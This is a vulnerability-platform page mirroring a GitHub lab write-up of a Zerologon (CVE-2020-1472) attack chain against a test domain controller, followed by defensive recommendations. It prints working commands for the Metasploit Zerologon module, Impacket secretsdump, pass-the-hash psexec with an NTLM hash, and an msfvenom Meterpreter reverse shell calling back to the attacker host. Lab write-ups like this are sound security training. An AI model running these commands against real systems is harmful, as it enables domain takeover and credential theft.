漏洞平台 - 免费 CVE 数据库与 AI 分析

POC详情: 2f15847d8d58055f6f78d287e990b1031959e688

来源

https://github.com/nyambiblaise/Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

关联漏洞

标题:Microsoft Windows Netlogon 安全特征问题漏洞 (CVE-2020-1472)
Description:Microsoft Windows Netlogon是美国微软（Microsoft）公司的Windows的一个重要组件，主要功能是用户和机器在域内网络上的认证，以及复制数据库以进行域控备份，同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 Microsoft Windows Netlogon 存在安全漏洞。攻击者可以使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器的易受攻击的 Netlogon 安全通道连接并进行特权提升。

Description

End-to-end Domain Controller exploitation using Metasploit and Impacket: discovered DC10, exploited Zerologon (CVE-2020-1472), extracted NTLM hashes, gained SYSTEM shell, and established a Meterpreter session.

介绍

# Domain-Controller-DC-Exploitation-with-Metasploit-Impacket
End-to-end Domain Controller exploitation using Metasploit and Impacket: discovered DC10, exploited Zerologon (CVE-2020-1472), extracted NTLM hashes, gained SYSTEM shell, and established a Meterpreter session. 

**Executive Summary**
This exercise demonstrates a complete, realistic attack chain against a domain controller that was vulnerable to CVE-2020-1472 (Zerologon). The engagement included discovery, service enrichment, exploitation, credential extraction, lateral movement, and post-exploitation validation. I successfully obtained SYSTEM-level access and established a persistent Meterpreter session on the DC using a combination of Zerologon, Impacket secretsdump + pass-the-hash, and msfvenom/meterpreter payloads. Screenshots and command artifacts were captured at each stage as evidence.

𝐋𝐚𝐛 𝐨𝐯𝐞𝐫𝐯𝐢𝐞𝐰: 
Simulated a full attack chain on a 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐨𝐦𝐚𝐢𝐧 𝐂𝐨𝐧𝐭𝐫𝐨𝐥𝐥𝐞𝐫 using 𝐌𝐞𝐭𝐚𝐬𝐩𝐥𝐨𝐢𝐭 and 𝐈𝐦𝐩𝐚𝐜𝐤𝐞𝐭 ; discovery, Zerologon, secretsdump, pass-the-hash, and a controlled Meterpreter session.

𝐖𝐡𝐲 𝐢𝐭 𝐦𝐚𝐭𝐭𝐞𝐫𝐬 𝐭𝐨 𝐨𝐫𝐠𝐚𝐧𝐢𝐳𝐚𝐭𝐢𝐨𝐧𝐬:
Because the DC controls authentication, group policy, and identity for the entire domain, a compromise can cascade into full business disruption, account takeovers, data exfiltration, ransomware deployment, and loss of regulatory trust. Protecting DCs safeguards uptime, revenue, and reputation by preventing attackers from turning identity into a single point of failure.

# Domain Controller (DC) Exploitation with Metasploit + Impacket

### SCENARIO

You are provided with two machines in a contained lab network. One system is a Windows Domain Controller (DC) named DC10 that hosts core AD services. The other system is a Kali workstation placed in the same server subnet for testing. The DC is assumed to expose typical domain services (for example, LDAP, Kerberos, SMB) and may be vulnerable to known issues. The Kali host is expected to be used for reconnaissance, exploitation, credential access, lateral movement, and post-exploitation validation. The task is to identify the DC, confirm domain details, obtain an initial foothold using an applicable technique, extract credential material to enable administrative access, and then demonstrate control of the DC through a remote shell and a managed agent session, while adapting to any environmental constraints such as patched services, restricted egress, or endpoint defenses.
DC: 10.1.16.1
Kali: 10.1.16.66

### Key Findings

- Critical vulnerability exploited: CVE-2020-1472 (Zerologon) was successfully exploited to reset the DC machine account password to empty.
- Credential compromise: NTLM hashes were extracted from the DC (secretsdump), revealing Administrator credentials enabling pass-the-hash.
- Complete domain control demonstrated: Using extracted hashes, a SYSTEM shell on DC10 was obtained (psexec), and a stable Meterpreter reverse shell was run, confirming remote code execution and persistence.
- Exposed services: LDAP, Kerberos, SMB and related RPC services were reachable from the attacking host, enabling discovery and exploitation.
- Attack surface risk: The DC accepted remote operations which allowed machine account manipulation and remote payload execution.

### 1) Discovery and Scoping

I used msfconsole with DB support, ran an nmap sweep from within MSF, imported results, and refined hosts and services to confirm DC10 exposure.

- Launched msfconsole with DB support and confirmed database connectivity.
- Ran an nmap scan across the subnet from msfconsole and imported results into the MSF DB.
- Cleaned the hosts table to remove my Kali IP. Reviewed services to spot likely DC indicators.
- Used MSF’s SYN port scanner with a constrained port range and global threading to refine service data.
- Fingerprinted SMB on Windows hosts to enrich OS details.
- Confirmed LDAP and Kerberos services on 10.1.16.1 and verified the domain name via an LDAP query.
- Decision: Treat 10.1.16.1 as the DC focus for exploitation and credential access.

<img width="655" height="197" alt="Image" src="https://github.com/user-attachments/assets/7f0e7560-bbe6-4111-b0b2-01d2675a03e6" />

<img width="816" height="609" alt="Image" src="https://github.com/user-attachments/assets/a46dddad-3248-4edb-a8f3-3d9e4015df74" />

<img width="1051" height="382" alt="Image" src="https://github.com/user-attachments/assets/47099e7b-ae0b-429e-b6d3-aec6ab300b06" />

### 2) Service Enrichment and DC Confirmation

I performed a SYN port scan in MSF, fingerprinted SMB, and confirmed LDAP and Kerberos on 10.1.16.1. I queried LDAP to retrieve the domain name.

<img width="1053" height="678" alt="Image" src="https://github.com/user-attachments/assets/543aace3-f376-40c5-8e87-b8639406f64e" />

<img width="1058" height="637" alt="Image" src="https://github.com/user-attachments/assets/fe45e6ca-2ef2-4cfd-ad0a-ebb286511358" />

<img width="1106" height="292" alt="Image" src="https://github.com/user-attachments/assets/002f5dc6-8740-4fd3-935b-c9f12c8e7262" />

<img width="1023" height="646" alt="Image" src="https://github.com/user-attachments/assets/c7648754-c64f-4e10-9c3f-12f4d39bf281" />

<img width="1000" height="660" alt="Image" src="https://github.com/user-attachments/assets/8db34cd0-60af-4bfc-be0c-52cebfaf7e3f" />
### SMB version check

- I used the SMB version module in msfconsole: `auxiliary/scanner/smb/smb_version`.
- I set the targets from the hosts table with hosts -R .
- Got SMB dialect and OS details back.
- Result: 10.1.16.1 showed Windows Server info, which lined up with it being the Domain Controller.

<img width="1117" height="477" alt="Image" src="https://github.com/user-attachments/assets/72970256-7ce2-4b6f-9265-1d7a723bfdf6" />

<img width="1120" height="527" alt="Image" src="https://github.com/user-attachments/assets/c38a859a-e269-4d19-b7d6-119afc5c28da" />

<img width="1029" height="458" alt="Image" src="https://github.com/user-attachments/assets/6db792fe-e09c-47e1-a908-256d8ea27a98" />

<img width="1056" height="486" alt="Image" src="https://github.com/user-attachments/assets/a877ba7f-5e72-44c4-83a6-4cc3e546081f" />

<img width="1053" height="678" alt="Image" src="https://github.com/user-attachments/assets/34a01c5a-4719-439a-a1e1-ede9371d9c85" />

### LDAP query

- For the LDAP query module , I used`auxiliary/gather/ldap_query`.
- et rhosts 10.1.16.1 to hit DC10 directly.
- I ran it to pull basic directory info.
- Result: Confirmed the domain name as “structureality” and that LDAP on the DC was responding.

<img width="1054" height="292" alt="Image" src="https://github.com/user-attachments/assets/ab9922a5-05ad-4acc-ad88-95a9134fbcfb" />

<img width="1058" height="637" alt="Image" src="https://github.com/user-attachments/assets/7757139c-0acc-42c9-a590-5fa8a5491ad4" />

<img width="1106" height="292" alt="Image" src="https://github.com/user-attachments/assets/61ead019-4714-432e-8f1b-7b5cabe79cb9" />

<img width="1065" height="212" alt="Image" src="https://github.com/user-attachments/assets/f07e4379-8c60-468b-aa23-58e1e9c14953" />

### 3) Zerologon Exploitation (Initial Access)

I ran **auxiliary/admin/dcerpc/cve_2020_1472_zerologon** against DC10 to reset the machine account password to empty.

<img width="1093" height="630" alt="Image" src="https://github.com/user-attachments/assets/2dc71304-1978-4ae9-b7ee-9e9207e24a14" />

<img width="1054" height="532" alt="Image" src="https://github.com/user-attachments/assets/c35345db-78e2-40d9-95df-7ba573fb09ca" />

### 4) Credential Access (secretsdump)
Using Impacket, I dumped NTLM hashes from the DC and identified Administrator credentials for pass-the-hash.

**`impacket-secretsdump -just-dc-ntlm structureality/dc10\$@10.1.16.1`**

<img width="1068" height="206" alt="Image" src="https://github.com/user-attachments/assets/874bfe89-396a-43a5-a276-a3408b4f1f73" />

<img width="1062" height="464" alt="Image" src="https://github.com/user-attachments/assets/e306711f-2cc1-4431-8353-2835eb869ce1" />

### 5) Lateral Movement (psexec)

I used pass-the-hash with psexec to obtain a SYSTEM-level shell on DC10 and validated host identity.

**`impacket-psexec structureality/administrator@10.1.16.1 -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9`**
As you can see, i am already in **C:\Windows\system32**

<img width="1056" height="311" alt="Image" src="https://github.com/user-attachments/assets/428e7417-b267-4b69-a944-73e02ac7cb53" />

<img width="2567" height="304" alt="Image" src="https://github.com/user-attachments/assets/1a06ddca-81fc-4ce1-820c-96631467514e" />

### 6) Post-Exploitation (Meterpreter)

I generated a reverse_tcp meterpreter payload, hosted it over HTTP, downloaded it to DC10, started a handler, and executed the payload to open a Meterpreter session.

**`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe`**

<img width="1017" height="194" alt="Image" src="https://github.com/user-attachments/assets/efaf81af-6f21-4126-a71e-7107b83514e7" />

<img width="1073" height="305" alt="Image" src="https://github.com/user-attachments/assets/a970a71f-8765-45fd-941b-c4954394a072" />
I launched a basic web server to allow the target system to easily access this meterpreter executable by using:

**`python3 -m http.server 8080`**

<img width="674" height="120" alt="Image" src="https://github.com/user-attachments/assets/57645185-3d3c-48c3-9cda-fd87e9134643" />
On the target machine, I executed the meterpreter executable (secret.exe)

<img width="950" height="85" alt="Image" src="https://github.com/user-attachments/assets/71bee5d8-6348-4854-804c-17303548180b" />

<img width="992" height="227" alt="Image" src="https://github.com/user-attachments/assets/30164cc7-95c9-42a0-9973-f94bfa91bb7f" />

<img width="910" height="617" alt="Image" src="https://github.com/user-attachments/assets/60a8a3c9-f26b-4cc7-9842-9c5ccdd254da" />

<img width="992" height="227" alt="Image" src="https://github.com/user-attachments/assets/ae9cb83a-ba7a-4e63-a395-daac0beca618" />

<img width="855" height="581" alt="Image" src="https://github.com/user-attachments/assets/ffe928ac-bb49-4a9d-9ec5-ca5fa3ad86a3" />

As you can see, I have now established a reverse shell connection between the target DC10 and Kali systems. This was accomplished by using only external/remote exploits against the vulnerable target. 

While the Kali system is located in the server subnet along with the DC10 target, `these types of attacks are possible over the internet if the target system is exposed to the open internet`.

### 7) Key Outcomes

- DC10 identified as domain controller for structureality
- Zerologon succeeded, enabling credential extraction
- Administrator hash used for SYSTEM shell via pass-the-hash
- Stable Meterpreter session confirmed on DC10

### Evidence

- MSF DB and nmap subnet scan logs confirming host/service discovery.
- SMB/LDAP/Kerberos enumeration output confirming DC services and domain name structureality.
- Zerologon module output showing machine account password reset to empty.
- secretsdump output with extracted NTLM hashes.
- psexec session logs demonstrating C:\Windows\System32.
- msfvenom and Meterpreter session screenshots confirming remote control.

### Actions Performed (summary)

- Discovery & Scoping: nmap scans from msfconsole; MSF DB used to manage hosts/services; confirmed DC10 as target.
- Service Enrichment: SMB fingerprinting, LDAP queries, Kerberos confirmation to validate domain controller role.
- Initial Access: Ran auxiliary/admin/dcerpc/cve_2020_1472_zerologon to reset DC machine account password.
- Credential Access: impacket-secretsdump to extract NTLM hashes from DC.
- Lateral Movement: impacket-psexec using Administrator NTLM hash → SYSTEM shell.
- Post-Exploitation: Built and hosted meterpreter payload (msfvenom), downloaded and executed on DC, and confirmed persistent session.

### Recommendations for the Network Owners

- Patch Netlogon vulnerability immediately and verify with a scan for CVE-2020-1472 exposure
- Enforce SMB signing and restrict DC SMB and RPC exposure to trusted admin subnets only
- Implement tiered admin and deny remote service execution from non-admin management hosts
- Disable or tightly control NTLM, prefer Kerberos, and monitor for pass-the-hash patterns
- Egress control: restrict outbound connections from servers, allowlist only required destinations and ports
- Endpoint protection: block unsigned binaries and apply AMSI-integrated scanning to PowerShell
- Monitoring: alert on machine account password resets, anomalous DRSUAPI access, and unexpected handler-like listeners
- Regularly rotate privileged credentials and use LAPS or PAM solutions to reduce hash reuse risk

文件快照


 [4.0K]  /data/pocs/2f15847d8d58055f6f78d287e990b1031959e688
└── [ 13K]  README.md

1 directory, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮件到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对 POC 代码进行快照，为了长期维护，请考虑为本地 POC 付费/捐赠，感谢您的支持。

支持本站 — 捐款将帮助我们持续运营

POC详情: 2f15847d8d58055f6f78d287e990b1031959e688

来源

关联漏洞

Description

介绍

文件快照

备注